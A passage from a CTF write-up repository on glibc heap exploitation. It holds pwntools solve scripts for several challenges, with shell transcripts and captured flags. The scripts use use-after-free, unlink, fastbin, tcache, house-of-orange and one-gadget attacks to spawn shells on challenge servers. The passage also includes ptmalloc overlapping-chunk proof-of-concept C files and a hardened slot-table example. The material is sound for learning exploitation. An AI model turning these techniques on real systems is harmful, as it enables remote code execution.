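           safe_modify_matches("BBBB\n", "BBBB"));                /* 1 */
    return 0;
}
```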
29 | r.recvuntil(">> ") 30 | sleep(2) 31 | 32 | def leak(number): 33 | r.sendline("V") 34 | r.sendline(str(number)) 35 | r.recvuntil("name : ") 36 | leak=r.recvuntil("\n") 37 | #print leak 38 | #print len(leak) 39 | #print hex(u64(leak[:-1].ljust(8,"\x00"))) 40 | leak=hex(u64(leak[:-1].ljust(8,"\x00"))) 41 | r.recvuntil(">> ") 42 | r.sendline("B") 43 | r.recvuntil(">> ") 44 | sleep(2) 45 | return leak 46 | 47 | 48 | 49 | malloc_got=0x0000000000603050 50 | put_got=0x0000000000603018 51 | 52 | pause() 53 | r.recvuntil(">> ") 54 | add("PPPP","QQQQ") 55 | add("RRRR","SSSS") 56 | add("TTTT","UUUU") 57 | add("VVVV","WWWW") 58 | edit(0,"Q"*8+p64(0)*4+p64(0x21)+p64(0x000000015a75b885)+p64(malloc_got)+p64(put_got)) 59 | #sleep(10) 60 | r.recvuntil(">> ") 61 | 62 | malloc=leak(1) 63 | malloc=int(malloc,16) 64 | 65 | lib_base=malloc-libc.symbols['malloc'] 66 | one=lib_base+0x45216 67 | print "leaked libcbase ="+hex(lib_base) 68 | print "leaked malloc ="+hex(malloc) 69 | print "leaked one ="+hex(one) 70 | 71 | sleep(20) 72 | edit(1,p64(one)) 73 | 74 | 75 | 76 | r.interactive() 77 | 78 | 79 | # 0x45216 execve("/bin/sh", rsp+0x30, environ) 80 | # constraints: 81 | # rax == NULL 82 | 83 | # 0x4526a execve("/bin/sh", rsp+0x30, environ) 84 | # constraints: 85 | # [rsp+0x30] == NULL 86 | 87 | # 0xf02a4 execve("/bin/sh", rsp+0x50, environ) 88 | # constraints: 89 | # [rsp+0x50] == NULL 90 | 91 | # 0xf1147 execve("/bin/sh", rsp+0x70, environ) 92 | # constraints: 93 | # [rsp+0x70] == NULL 94 | 95 | 96 | # [*] Paused (press any to continue) 97 | # leaked libcbase =0x7f1cf459c000 98 | # leaked malloc =0x7f1cf4620130 99 | # leaked one =0x7f1cf45e1216 100 | # [*] Switching to interactive mode 101 | # $ ls 102 | # flag 103 | # marimo 104 | # $ cat flag 105 | # But_every_cat_is_more_cute_than_Marimo 106 | # $ 107 | -------------------------------------------------------------------------------- /heap/Jarvis0J/guestbook2/readme.md: 
--------------------------------------------------------------------------------



# Reference:
1. http://veritas501.space/2017/03/10/JarvisOJ_WP/

2. http://www.wooy0ung.me/writeup/2017/07/31/jarvisoj-guestbook2/
--------------------------------------------------------------------------------
/heap/Jarvis0J/guestbook2/solve.py:
--------------------------------------------------------------------------------
from pwn import *

local=1
#r=process('./guestbook2',env={"LD_PRELOAD": "./libc.so.6"})
#libc = ELF('libc.so.6')
if local:
    r=process('./guestbook2')
    libc = ELF('libc-2.24_64.so')
    gdb.attach(r)

else:
    host = "pwn.jarvisoj.com"
    port = 9879
    r = remote(host,port)
    libc = ELF('libc.so.6')

def list(no):
    r.sendline("1")


def new(len,content):
    r.sendline("2")
    r.recvuntil(":")
    r.sendline(str(len))
    r.recvuntil(":")
    r.send(content)
    r.recvuntil(":")
    sleep(1)

def edit(no,len,content):
    r.sendline("3")
    r.recvuntil(":")
    r.sendline(str(no))
    r.recvuntil(":")
    r.sendline(str(len))
    r.recvuntil(":")
    r.send(content)
    r.recvuntil(":")
    sleep(1)

def free(no):
    r.sendline("4")
    r.recvuntil(":")
    r.sendline(str(no))
    r.recvuntil(":")

new(0x80,"A"*0x80)#0
new(0x80,"B"*0x80)#1
new(0x80,"C"*0x80)#2

free(1)

edit(0,0x90,("A"*0x80)+("D"*0x10))

#leak libc
r.sendline("1")
r.recvuntil("DDDDDDDDDDDDDDDD")
leak=r.recvuntil("\n")
print leak
print len(leak)
leak=u64(leak[:-1].ljust(8,"\x00"))
#leak=u64(leak[:-1].ljust(8,"\x00"))
print "leaked :"+hex(leak)
free_got=0x0000000000602018
put_got=0x0000000000602020

if local:
    libc_base=leak-3268136-libc.symbols['malloc']
    system=libc_base+libc.symbols['system']
    atoi=libc_base+libc.symbols['atoi']
    print "libc_base : "+hex(libc_base)
    print "system : "+hex(system)
    print "atoi : "+hex(atoi)
    pause()


else:
    a=1

#clean heap
free(0)
free(2)

new(0x80,"A"*0x80)#0
new(0x80,"B"*0x80)#1
new(0x80,"C"*0x80)#2
new(0x80,"D"*0x80)#3
new(0x80,"E"*0x80)#4
free(3)
free(1)
edit(0,0x90,("A"*0x80)+("D"*0x10))

r.sendline("1")
r.recvuntil("DDDDDDDDDDDDDDDD")
leak=r.recvuntil("\n")
print leak
print len(leak)
leak=u64(leak[:-1].ljust(8,"\x00"))
print "leaked heap :"+hex(leak)
heapbase=leak-6608
print "heapbase :"+hex(heapbase)
#free(0)
free(2)
free(4)
edit(0,0x90*8,"\x00"*0x90*8)

free(0)

new(0x80,"A"*0x80)#0
new(0x80,"B"*0x80)#1
new(0x80,"C"*0x80)#2
new(0x80,"D"*0x80)#3
new(0x80,"E"*0x80)#4
free(3)
free(1)

#0x0000000006020A8
atoi_got=0x0000000000602070
known=heapbase+0x30
fake_heap =p64(0)+p64(0x80)+p64(known-0x18)+p64(known-0x10)+"E"*0x60
fake_heap+=p64(0x80) + p64(0x90) + 'F'*0x70
edit(0,(0x80*2),fake_heap)
free(1)
pay = p64(2) + p64(1) + p64(0x100) + p64(known-0x18)
pay += p64(1)+p64(0x8)+p64(atoi_got)
pay += '\x00'*(0x100-len(pay))

#pause()
edit(0,len(pay),pay)
sleep(2)
r.recvuntil(":")

if local==0:
    r.sendline("1")
    r.recvuntil("1. ")
    leak=r.recvuntil("\n")
    print leak
    leak=u64(leak[:-1].ljust(8,"\x00"))
    print "leaked atoi :"+hex(leak)
    libc_base=leak-libc.symbols['atoi']
    print "libc_base : "+hex(libc_base)
    system=libc_base+libc.symbols['system']
    print "system : "+hex(system)


edit(1,8,p64(system))
#pause()
r.sendline("ls -al")
r.interactive()

#PCTF{Double_Fr33_free_Fr3e_Fre3_h4ve_Fun}
--------------------------------------------------------------------------------
/heap/N1CTF_2018_vote/b8a4590d-9fee-4a34-8396-d63adac62a0d.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/N1CTF_2018_vote/b8a4590d-9fee-4a34-8396-d63adac62a0d.zip
--------------------------------------------------------------------------------
/heap/N1CTF_2018_vote/readme.md:
--------------------------------------------------------------------------------
# vote 250(pwn)

Challenge:

>hk node: nc 47.90.103.10 6000
>
>cn node: nc 47.97.190.1 6000
>
>(Two challenge servers are identical, use either of them.)
>
>[Download](b8a4590d-9fee-4a34-8396-d63adac62a0d.zip)


menu:
```
0: Create
1: Show
2: Vote
3: Result
4: Cancel
5: Exit
Action:
```

This is a classic use-after-free challenge.

The Create code:

```C++
void sub_400D2C()
{
  ...........
  for ( i = 0; i <= 15; ++i )
  {
    if ( !*(&ptr + i) )
    {
      sub_400C52(4199328LL);
      v2 = sub_400C90(4199328LL);
      if ( v2 > 0 && v2 <= 4096 )
      {
        v0 = malloc(v2 + 16);
        *(_QWORD *)v0 = 0LL;
        ..............
}
```

The Cancel code:

```C++
void sub_40109D()
{
  char *v0; // rsi@8
  int v1; // [sp+Ch] [bp-4h]@1

  sub_400C52("Please enter the index: ");
  v1 = sub_400C90("Please enter the index: ");
  if ( v1 >= 0 && v1 <= 15 && *(&ptr + v1) )
  {
    if ( --qword_602180[v1] == --*(_QWORD *)*(&ptr + v1) )
    {
      if ( qword_602180[v1] < 0 )
        free(*(&ptr + v1));
    }
    else if ( qword_602180[v1] < 0 )
    {
      v0 = (char *)*(&ptr + dword_602160) + 16;
      printf("%s", v0);
      fflush(stdout);
      sub_400C00(" has freed", v0);
      free(*(&ptr + v1));
      *(&ptr + v1) = 0LL;
    }
  }
}
```

The bug: after the free, the corresponding entry of the ptr array is not reset to 0, which gives a UAF.

One thing to watch out for: if I request a name size of 0x20, the object actually returned is 0x40 (the consequence of not reading the IDA code carefully.........)

After that it is the standard routine: leak libc -> fastbin attack -> get shell.


However, since there is no direct edit, there are a lot of error checks to bypass .....


After leaking libc and triggering consolidation, malloc a slightly larger chunk that covers the addresses of all the previous chunks.

Then write fake metadata at the positions corresponding to the previous memory addresses (error check bypass, e.g. the size fields before and after must match).

Then free chunk 0 again, to prevent the next malloc from triggering a heap-inside-freed-heap error.



Then malloc a 0x50 (0x70) to take the top chunk, and malloc another 0x50 (0x70) fastbin to get arbitrary write...
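The two bugs described in this write-up and in the SuperMarimo one above (a modify that does not bound the write into profile, and a cancel that frees an entry without clearing its ptr array slot) each come down to one missing check. The following is an added example, not the challenge code and not from this repo's solve scripts: a small slot table in the style of the two binaries, written so that both bugs cannot occur. The function names, the 16-slot table and the 0x20-byte profile buffer follow the write-ups; everything else is an assumption.

```c
/* Added example (not from the challenge binaries or this repo): a slot table
 * in the style of SuperMarimo/vote with the two missing checks in place.
 * Names, sizes and the table layout are assumptions, not the real binaries. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SLOTS       16      /* vote keeps 16 entries in its ptr array */
#define PROFILE_CAP 0x20    /* SuperMarimo's profile buffer: 0x20 bytes */

struct marimo {
    char *name;
    char *profile;          /* heap buffer of exactly PROFILE_CAP bytes */
};

static struct marimo *slots[SLOTS];

/* Copy src into a cap-byte buffer only if it fits including the NUL.
 * Returns 0 on success, -1 if it would overflow (the check modify lacked). */
static int copy_bounded(char *dst, size_t cap, const char *src)
{
    size_t n = strlen(src);
    if (n >= cap)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

static char *dup_str(const char *s)
{
    size_t n = strlen(s) + 1;
    char *p = malloc(n);
    if (p)
        memcpy(p, s, n);
    return p;
}

/* Create: returns the slot index, or -1 if the table is full or input invalid. */
int marimo_add(const char *name, const char *profile)
{
    for (int i = 0; i < SLOTS; i++) {
        if (slots[i])
            continue;
        struct marimo *m = calloc(1, sizeof *m);
        if (!m)
            return -1;
        m->name = dup_str(name);
        m->profile = calloc(1, PROFILE_CAP);
        if (!m->name || !m->profile ||
            copy_bounded(m->profile, PROFILE_CAP, profile) != 0) {
            free(m->name); free(m->profile); free(m);
            return -1;
        }
        slots[i] = m;
        return i;
    }
    return -1;
}

/* Modify: validates the index, rejects freed slots and bounds the write.
 * Returns 0, -1 for a bad index or empty slot, -2 if profile does not fit. */
int marimo_modify(int idx, const char *profile)
{
    if (idx < 0 || idx >= SLOTS || !slots[idx])
        return -1;
    return copy_bounded(slots[idx]->profile, PROFILE_CAP, profile) == 0 ? 0 : -2;
}

/* Cancel: frees the entry AND clears the slot, so no later lookup can reach
 * the freed chunk (vote left the stale pointer in its ptr array). */
int marimo_cancel(int idx)
{
    if (idx < 0 || idx >= SLOTS || !slots[idx])
        return -1;
    free(slots[idx]->name);
    free(slots[idx]->profile);
    free(slots[idx]);
    slots[idx] = NULL;
    return 0;
}

/* Show: NULL for an empty or cancelled slot instead of reading freed memory. */
const char *marimo_profile(int idx)
{
    if (idx < 0 || idx >= SLOTS || !slots[idx])
        return NULL;
    return slots[idx]->profile;
}

int main(void)
{
    int a = marimo_add("AAAA", "BBBB");
    printf("slot %d profile: %s\n", a, marimo_profile(a));
    char big[PROFILE_CAP + 8];                   /* 39 chars: too long for 0x20 bytes */
    memset(big, 'X', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    printf("oversized modify -> %d\n", marimo_modify(a, big));
    marimo_cancel(a);
    printf("after cancel: %s\n", marimo_profile(a) ? "still reachable" : "slot cleared");
    return 0;
}
```

The length test in `copy_bounded` is `n >= cap`, not `n > cap`, because the terminating NUL also needs a byte; a 0x20-character profile is therefore rejected, which is exactly the boundary the original modify let through. Clearing `slots[idx]` in `marimo_cancel` is what turns the later `marimo_modify(idx, ...)` and `marimo_profile(idx)` into clean errors instead of writes into and reads from a freed chunk.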

```python
create("qqqq",0x50)
create("A"*3+p64(rce)*4,0x50)
print "[+]get shell :)"
r.sendline("0")
sleep(1)
#trigger one gadget
r.sendline("4000")
r.sendline("$0")
r.sendline("ls -al")
r.interactive()
```

# Solution


solution: [solve.py](solve.py)

```
# [*] '/root/Desktop/CTF_Game/n1ctf_2018/vote/libc-2.23.so'
#     Arch:     amd64-64-little
#     RELRO:    Partial RELRO
#     Stack:    Canary found
#     NX:       NX enabled
#     PIE:      PIE enabled
# [*] Paused (press any to continue)
# 139870119717752

# 0x7f360ccceb78
# leaked libc =0x7f360c90a000
# malloc_hook = 0x7f360ccceb10
# one = 0x7f360c9fa274
# [+]get shell :)
# [*] Switching to interactive mode
# Please enter the name's size: total 36
# dr-xr-xr-x 2 pwn  pwn   4096 Mar 10 18:38 .
# drwxr-xr-x 3 root root  4096 Mar  8 15:28 ..
# -rw-r--r-- 1 pwn  pwn    220 Mar  8 15:28 .bash_logout
# -rw-r--r-- 1 pwn  pwn   3771 Mar  8 15:28 .bashrc
# -rw-r--r-- 1 pwn  pwn    655 Mar  8 15:28 .profile
# -rw-r--r-- 1 root root    26 Mar  9 11:12 flag
# -rwxr-xr-x 1 root root 10544 Mar  8 15:29 vote
# $ cat flag
# N1CTF{Pr1nTf_2333333333!}
# $

```
--------------------------------------------------------------------------------
/heap/N1CTF_2018_vote/solve.py:
--------------------------------------------------------------------------------
from pwn import *

LOCAL=0

if LOCAL:
    #0x3f2d6
    #0xd67cf
    #0x3f32a
    r=process('./vote')
    libc=ELF("libc-2.24_64.so")
    gdb.attach(r)
    malloc_diff=-3268136
    one=0x3f2d6
else:
    #0x45216
    #0x4526a
    #0xf0274
    #0xf1117
    #r=process('./vote',env={"LD_PRELOAD": "./libc-2.23.so"})
    #gdb.attach(r)
    host="47.90.103.10"
    port=6000
    r = remote(host,port)
    libc=ELF("libc-2.23.so")
    malloc_diff=-3410504
    one=0xf0274


pause()

# menu helpers: Create / Show / Vote / Cancel
def create(content,size):
    r.sendline("0")
    r.recvuntil(": ")
    r.sendline(str(size))
    r.recvuntil(": ")
    r.sendline(content)
    r.recvuntil("Action: ")

def show(idx):
    r.sendline("1")
    r.recvuntil(": ")
    r.sendline(str(idx))
    r.recvuntil("count: ")
    leak=r.recvuntil("\n")
    print leak
    leak=int(leak[:-1])
    print hex(leak)
    r.recvuntil("Action: ")
    return leak

def vote(idx):
    r.sendline("2")
    r.recvuntil(": ")
    r.sendline(str(idx))
    r.recvuntil("Action: ")

def cancel(idx):
    r.sendline("4")
    r.recvuntil(": ")
    r.sendline(str(idx))
    r.recvuntil("Action: ")





r.recvuntil("Action: ")
create("AAAAAAAA",0x100)
create("BBBBBBBB",0x50)#32
create("CCCCCCCC",0x100)
create("BBBBBBBB",0x50)#32

cancel(0)
leakk=show(0)
mallocc=leakk+malloc_diff
libc_base=mallocc-libc.symbols['malloc']
print "leaked libc ="+ hex(libc_base)
malloc_hook=libc_base+libc.symbols['__malloc_hook']
print "malloc_hook = "+hex(malloc_hook)
rce=libc_base+one
print "one = "+hex(rce)
#clean heap
cancel(1)
cancel(2)
cancel(3)
#pause()
create("R"*0x100+p64(0x100)+p64(0x71)+p64(malloc_hook-35),0x500) #new 0

#UAF
cancel(1)
#added to smallbin to bypass checking
cancel(0)
create("R"*0x100+p64(0x100)+p64(0x71)+p64(malloc_hook-35),0x300) #new 0

create("qqqq",0x50)
create("A"*3+p64(rce)*4,0x50)
print "[+]get shell :)"
r.sendline("0")
sleep(1)
#trigger one gadget
r.sendline("4000")
r.sendline("$0")
r.sendline("ls -al")
r.interactive()


# [*] '/root/Desktop/CTF_Game/n1ctf_2018/vote/libc-2.23.so'
#     Arch:     amd64-64-little
#     RELRO:    Partial RELRO
#     Stack:    Canary found
#     NX:       NX enabled
#     PIE:      PIE enabled
# [*] Paused (press any to continue)
# 139870119717752

# 0x7f360ccceb78
# leaked libc =0x7f360c90a000
# malloc_hook = 0x7f360ccceb10
# one = 0x7f360c9fa274
# [+]get shell :)
# [*] Switching to interactive mode
# Please enter the name's size: total 36
# dr-xr-xr-x 2 pwn  pwn   4096 Mar 10 18:38 .
# drwxr-xr-x 3 root root  4096 Mar  8 15:28 ..
# -rw-r--r-- 1 pwn  pwn    220 Mar  8 15:28 .bash_logout
# -rw-r--r-- 1 pwn  pwn   3771 Mar  8 15:28 .bashrc
# -rw-r--r-- 1 pwn  pwn    655 Mar  8 15:28 .profile
# -rw-r--r-- 1 root root    26 Mar  9 11:12 flag
# -rwxr-xr-x 1 root root 10544 Mar  8 15:29 vote
# $ cat flag
# N1CTF{Pr1nTf_2333333333!}
# $
--------------------------------------------------------------------------------
/heap/POC2018_theori_speedrun/solve.py:
--------------------------------------------------------------------------------
from pwn import *

#c4n_i_j0in_theori?
#r=process("speedypwn_c743765c8f6d2fcfc0eabde9315f4a9b")
r=remote("speedhack-pwn-13935cd1502a01e8890ec92ac920528c.theori.io",8171)
r.recvuntil(">")


r.sendline(str(1))
r.sendline("FUCK")

r.recvuntil(">")
r.sendline(str(2))
r.recvuntil(">")
r.sendline(str(3))
sleep(1)
r.sendline(str(16))
sleep(2)
r.send(p64(0x41DEBF43)+p64(0x0000000000400837^0x213141516171))
r.sendline(str(1))
r.interactive()
--------------------------------------------------------------------------------
/heap/POC2018_theori_speedrun/speedypwn_c743765c8f6d2fcfc0eabde9315f4a9b:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/POC2018_theori_speedrun/speedypwn_c743765c8f6d2fcfc0eabde9315f4a9b
--------------------------------------------------------------------------------
/heap/hacklu_2018_heapheaven2/heap_heaven_2_4ea0c03fca366bef52322a964fc62325.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/hacklu_2018_heapheaven2/heap_heaven_2_4ea0c03fca366bef52322a964fc62325.zip
--------------------------------------------------------------------------------
/heap/hacklu_2018_heapheaven2/solve.py:
--------------------------------------------------------------------------------
from pwn import *

#r=process("./heap_heaven_2",env={"LD_PRELOAD": "./libc.so.6"})
#pause()#
r=connect("arcade.fluxfingers.net",1809)
r.recvuntil("exit\n")
#libc=ELF("./libc.so.6")
libc=ELF("./libc.so.6")
# menu helpers: write content at an offset, free at an offset, leak a qword at an offset
def write(content,offset):
    r.sendline("1")
    r.recvuntil("?")
    r.sendline(str(len(content)))
    r.recvuntil("?")
    r.sendline(str(offset))
    r.send(content)
    r.recvuntil("exit\n")

def free(offset):
    r.sendline("3")
    r.recvuntil("?")
    r.sendline(str(offset))
    r.recvuntil("exit\n")

def leak(offset):
    r.sendline("4")
    r.recvuntil("?\n")
    r.sendline(str(offset))
    leakage=r.recvuntil("\n")
    # print leakage
    leakage=u64(leakage[:-1].ljust(8,"\x00"))
    # print hex(leakage)
    r.recvuntil("exit\n")
    return leakage


#chunk 1
write(p64(0)+p64(0x91),0x0)
write("AAAAAAAA",0x10)
#chunk 2
write(p64(0)+p64(0x91),0x90)
write("BBBBBBBB",0xa0)

#chunk 3
write(p64(0)+p64(0x91),0x120)
write("CCCCCCCC",0x130)

#chunk 4
write(p64(0)+p64(0x91),0x1b0)
write("DDDDDDDD",0x1c0)

#chunk 5
write(p64(0)+p64(0x91),0x240)
write("EEEEEEEE",0x250)

#chunk 6
write(p64(0)+p64(0x91),0x2d0)
write("FFFFFFFF",0x2e0)

#chunk 7
write(p64(0)+p64(0x91),0x360)
write("GGGGGGGG",0x370)

#chunk 8
write(p64(0)+p64(0x91),0x3f0)
write("HHHHHHHH",0x400)

#chunk 9
write(p64(0)+p64(0x91),0x480)
write("IIIIIIII",0x490)

write(p64(0)+p64(0x20ff1),0x510)

#finish 0x90 tcache
for i in range(7):
    free(0x10+(i*0x90))

free(304)
#real heap
heap_leak=leak(304)
#libc
#fix the null byte
write("\x41",304)
libc_leak=leak(448)-0x41
write("\x00",304)
#mmap
mmap_leak=leak(592)

#log.info("heap leak : "+hex(heap_leak))
#log.info("libc leak : "+hex(libc_leak))
#log.info("mmap leak : "+hex(mmap_leak))

heap_base = heap_leak - 0x290
libc_base = libc_leak - 1829632
mmap_base = mmap_leak - 0x130

log.info("heap base : "+hex(heap_base))
log.info("libc base : "+hex(libc_base))
log.info("mmap base : "+hex(mmap_base))

#make it point to menu
#and leak it out
code_base_container = heap_base +648
#print hex(code_base_container)

write(p64(code_base_container),304-0x90)
write(p64(mmap_base+0xa0),304)
code_base =leak(160)-0x1683
mmap_size = code_base+0x00000004010
log.info("code base : "+hex(code_base))
log.info("mmap_size : "+hex(mmap_size))
log.info("vtable : "+str(heap_base+0x260-mmap_base))

write(p64(0)+p64(0x21),0x510)
write(p64(0)+p64(0x20ff1),0x530)

free(0x520)
write(p64(libc_base+0xe75f0)*2,0x520)
r.sendline("3")
r.sendline(str(heap_base+0x260-mmap_base))
sleep(1)
r.sendline("ls -al")
r.interactive()


#At which offset do you want to free?
#\x89��Fc: cannot set terminal process group (5855): Inappropriate ioctl for device
#\x89��Fc: no job control in this shell
#[chall@hacklu18 ~]$ total 32
#drwxr-s--- 2 root chall  4096 Oct 13 22:50 .
#drwxr-xr-x 3 root root   4096 Oct  9 16:16 ..
#-r--r----- 1 root chall    43 Oct 13 22:52 flag
#-rwxr-sr-x 1 root chall 17304 Oct 13 22:50 heap_heaven_2
#[chall@hacklu18 ~]$ $ cat flag
#flag{th1s_w4s_still_ez_h3ap_stuff_r1ght?!}
#[chall@hacklu18 ~]$ exit
#[*] Got EOF while reading in interactive
--------------------------------------------------------------------------------
/heap/hitcon2016_house_of_orange/houseoforange_22785bece84189e632567da38e4be0e0c4bb1682:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/hitcon2016_house_of_orange/houseoforange_22785bece84189e632567da38e4be0e0c4bb1682
--------------------------------------------------------------------------------
/heap/hitcon2016_house_of_orange/libc.so.6_375198810bb39e6593a968fcbcf6556789026743:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/hitcon2016_house_of_orange/libc.so.6_375198810bb39e6593a968fcbcf6556789026743
--------------------------------------------------------------------------------
/heap/hitcon2016_house_of_orange/solve.py:
--------------------------------------------------------------------------------
from pwn import *


#http://tacxingxing.com/2018/01/10/house-of-orange/
libc=ELF("libc.so.6_375198810bb39e6593a968fcbcf6556789026743")
#libc=ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
r=process('./houseoforange_22785bece84189e632567da38e4be0e0c4bb1682',env={"LD_PRELOAD": "./libc.so.6_375198810bb39e6593a968fcbcf6556789026743"})
#r=process('./houseoforange_22785bece84189e632567da38e4be0e0c4bb1682')
pause()

def build(size,payload,price,color):
    r.sendline("1")
    r.recvuntil("name :")
    r.sendline(str(size))
    r.recvuntil(" :")
    r.send(payload)
    r.recvuntil(":")
    r.sendline(str(price))
    r.recvuntil(":")
    r.sendline(str(color))
    r.recvuntil(" : ")

def upgrade(size,payload,price,color):
    r.sendline("3")
    r.recvuntil("name :")
    r.sendline(str(size))
    r.recvuntil(":")
    r.send(payload)
    r.recvuntil(":")
    r.sendline(str(price))
    r.recvuntil(":")
    r.sendline(str(color))
    r.recvuntil(" : ")


r.recvuntil(" : ")

build(0x80,"AAAAAAAA",1000,1)

payload="Q"*168+p64(0xf31)
upgrade(len(payload),payload,2000,2)
pause()
log.info("Malloc large chunk to trigger sysmalloc from mmap")
build(0x10000,"ZZZZZZZZ",1,1)
pause()
log.info("leaking")
log.info("build a 0x400 for leaking libc and heap ptr, due to large chunk features")
build(0x500,"BBBBBBBB",1,1)
sleep(0.1)
r.sendline("2")
r.recvuntil("BBBBBBBB")
leak=r.recvuntil("\n")
libc_leak= u64(leak[:-1].ljust(8,"\x00"))
log.info("libc leak : "+hex(libc_leak))

upgrade(0x500,"B"*16,2000,2)
r.sendline("2")
r.recvuntil("B"*16)
leak=r.recvuntil("\n")
heap=u64(leak[:-1].ljust(8,"\x00"))-0x130

malloc = libc_leak -(0x7f5180292188-0x7f51802b0f00)

libc_base= malloc- (0x7f1b214a5f00 - 0x7f1b210c3000)
io_list_all = libc_base + libc.symbols['_IO_list_all']
log.info("io_list_all : "+hex(io_list_all))

log.info("heap : "+hex(heap))
log.info("malloc : "+hex(malloc))
log.info("libc base : "+hex(libc_base))
log.info("_IO_list_all : "+hex(io_list_all))
log.info("malloc_hook : "+hex(libc_base+libc.symbols['__malloc_hook']))
log.info("system : "+hex(libc_base+libc.symbols['system']))
log.info("start fsop")
#old region
payload="X"*0x500

#overflow region
payload+=p64(0x0)+p64(0x21) # works for 0x0 ,0x21
payload+="Q"*16 #garbage

fs = "/bin/sh\x00"+ p64(0x61) #fake file stream
fs += p64(0)+p64(io_list_all-0x10) #do unsorted bin attack fd bk pointer
fs += p64(0)+p64(1)
fs = fs.ljust(0xc0,"\x00")
fs +=p64(0)

payload+=fs
payload+= p64(0)*2
payload+= p64(heap+0x740) # pointing to the vtable
payload+= p64(0)*3 #vtable for error
payload+=p64(libc_base+libc.symbols['system'])
upgrade(0x900,payload,2000,2)
log.info("After this pause will get shell")
pause()
r.sendline("1")
r.sendline("ls -al")
r.interactive()
--------------------------------------------------------------------------------
/heap/hitcon2018_children_tcache/children_tcache-d737eac1ffe293ffe697bffc692a1280.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/hitcon2018_children_tcache/children_tcache-d737eac1ffe293ffe697bffc692a1280.tar.gz
--------------------------------------------------------------------------------
/heap/hitcon2018_children_tcache/solve.py:
--------------------------------------------------------------------------------
from pwn import *

#r=process("./children_tcache")
r=connect("54.178.132.125",8763)
libc=ELF("./libc.so.6")
#pause()
def alloc(size,content):
    r.sendline("1")
    r.recvuntil(":")
    r.sendline(str(size))
    r.recvuntil(":")
    r.send(content)
    r.recvuntil(": ")


def free(id):
    r.sendline("3")
    r.recvuntil(":")
    r.sendline(str(id))
    r.recvuntil(": ")


r.recvuntil(":")

alloc(0x450,"A"*8)#0
alloc(0x70,"B"*8)#1
alloc(0x600-0x10,"C"*8)#2
alloc(0x40,"D"*8)#3 pad

free(1) #put to tcache first
free(0)

#clean the 0xda
for i in range(9):
    alloc(0x78-i,"q"*(0x78-i))#0
    free(0)
alloc(0x78,"q"*0x70+p64(0x460+0x80))#0

free(2)

alloc(0x450,"x")#1

alloc(0x620,"freeme")#0 and #2 is point to freeme as well

free(0)
r.sendline("2")
r.recvuntil(":")
r.sendline("2")
leak= r.recvuntil("\n")
leak=(u64(leak[:-1].ljust(8,"\x00")))
print hex(leak)
r.recvuntil(": ")
libc_base = leak-(0x7f092ae27ca0-0x00007f092aa3c000)
malloc_hook = libc_base+libc.sym["__malloc_hook"]

print(hex(malloc_hook))
one=libc_base+0x4f322
print(hex(one))
alloc(0x60,"MALLOC")
#now 0 and 2 is pointed to MALLOC
free(0)
free(2)
alloc(0x60,p64(malloc_hook))
alloc(0x60,"x")
alloc(0x60,p64(one))
sleep(1)
r.sendline("1")
r.sendline("100")
sleep(2)
r.sendline("ls -al")

r.interactive()
#hitcon{l4st_rem41nd3r_1s_v3ry_us3ful}
--------------------------------------------------------------------------------
/heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/consol_poc1.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main()
{
    void *V = malloc(0x18); // vulnerable object
    void *A = malloc(0xf0); // chunk size 0x100, not fastbin
    char *T = (char*)malloc(0x10); // target
    void *B = malloc(0xf0); // chunk size 0x100, not fastbin
    strcpy(T, "Target");
    printf("T: %s\n", T);
    free(B);
    memcpy(V, "AAAAAAAAAAAAAAAAAAAAAAAA\x21",0x19); // off-by-one, enlarge sizeof A to 0x120
    free(A); // force nonadjacent consolidation with B
    char *C = (char*)malloc(0x110); // malloc C, overlapping T
    strcpy(C+0x100, "Corrupted!");
    printf("T: %s\n", T);
    return 0;
}
--------------------------------------------------------------------------------
/heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/consol_poc2.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main()
{
    void *A = malloc(0xf0); // chunk size 0x100, not fastbin
    char *T = (char*)malloc(0x10); // target
    void *V = malloc(0x18); // vulnerable object
    void *B = malloc(0xf0); // chunk size 0x100, not fastbin
    strcpy(T, "Target");
    printf("T: %s\n", T);
    free(A);
    memcpy(V, "AAAAAAAAAAAAAAAA\x40\x01\x00\x00\x00\x00\x00\x00\x00", 0x19); //null byte off by 1, clear prev_inuse of B and set prev_size to 0x140
    free(B); // force nonadjacent consolidation with A
    char *C = (char*)malloc(0x110); // malloc C, overlapping T
    strcpy(C+0x100, "Corrupted!");
    printf("T: %s\n", T);
    return 0;
}
--------------------------------------------------------------------------------
/heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/enlarge_infoleak_poc.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(){

    void *H = malloc(0x80);
    void *V = malloc(0x18); // vulnerable object
    void *A = malloc(0xf0); // chunk size 0x100, not fastbin
    long *T = (long*)malloc(0x10); // target
    T[0] = 0x1234567890abcdef;
    T[1] = 0xdeadbeaf;
    printf("T: %lx %lx\n", T[0], T[1]);
    free(A);
    memcpy(V, "AAAAAAAAAAAAAAAAAAAAAAAA\x21",0x19); // off-by-one, enlarge sizeof A to 0x120
    void *B = malloc(0xf0); // malloc B,split A
    free(H); // insert one more chunk into unsorted bin
    printf("T: %lx %lx\n", T[0], T[1]);
